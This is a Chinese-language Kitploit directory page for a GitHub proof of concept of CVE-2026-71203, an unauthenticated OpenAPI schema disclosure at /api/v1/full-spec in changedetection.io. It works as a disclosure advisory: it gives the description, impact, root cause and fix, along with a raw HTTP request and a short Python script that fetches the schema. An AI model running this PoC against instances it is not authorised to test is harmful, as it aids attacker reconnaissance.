Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-71203-PoC — PoC:changedetection.io 未认证 OpenAPI Schema 信息泄露(CVE-2026-71203,中危 5.3) | Kitploit
工具/GitHubGitHub/nel-droid/cve-2026-71203-poc
漏洞分析漏洞利用API安全测试信息收集Web安全渗透测试API 安全
GitHubnel-droid/cve-2026-71203-poc

CVE-2026-71203-PoC

PoC:changedetection.io 未认证 OpenAPI Schema 信息泄露(CVE-2026-71203,中危 5.3)

查看仓库
724天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-71203 — changedetection.io:/api/v1/full-spec 缺少身份验证,泄露完整 OpenAPI 架构

产品: dgtlmoon/changedetection.io — v0.55.7 文件: changedetectionio/api/Spec.py CWE: CWE-306 — 关键功能缺少身份验证 CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N — 5.3(中危) CNA: Turan Security · CVE 记录

描述

changedetection.io 的 REST API 资源受 @auth.check_token 装饰器保护, 该装饰器用于校验调用方的 x-api-key 请求头——但注册在 /api/v1/full-spec(changedetectionio/api/Spec.py)的 Spec 资源例外,其 方法既未使用 ,也未使用 。

get
@auth.check_token
@validate_openapi_request

影响

任何未经身份验证的网络客户端都可以获取该实例的完整 OpenAPI 架构, 在无需提供任何 API 密钥的情况下泄露完整的内部 API 接口(所有资源路径、参数和响应 结构)。虽然该架构本身并非敏感的用户数据, 但它向攻击者提供了一张完整、权威的 API 端点地图,标明了所有其他可攻击的端点—— 从而降低了对该实例实际受保护资源进行进一步侦察的成本。

复现

root@kitploit:~
GET /api/v1/full-spec HTTP/1.1
Host: target-instance

无需 x-api-key 请求头、Cookie 或任何凭据,响应即为完整的 OpenAPI 规范文档。

概念验证(Python):

root@kitploit:~
import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"

resp = requests.get(f"{target}/api/v1/full-spec", timeout=10)
print(f"[*] Status: {resp.status_code}")
if resp.status_code == 200:
    print("[+] Full OpenAPI schema disclosed with zero authentication:")
    print(resp.text[:1000])

根本原因

API 中所有其他 REST 资源的处理方法都应用了 @auth.check_token(以及 @validate_openapi_request)装饰;而 Spec 资源的 get 方法并未以相同方式装饰,使其成为本应由 API 密钥保护的接口中唯一未经身份验证的端点。

修复建议

参照所有其他 API 资源,为 Spec.get() 应用 @auth.check_token;或者,如果该架构本就打算公开,就应将其作为一项明确且记录在案的决策,而不是一处不一致。

下载工具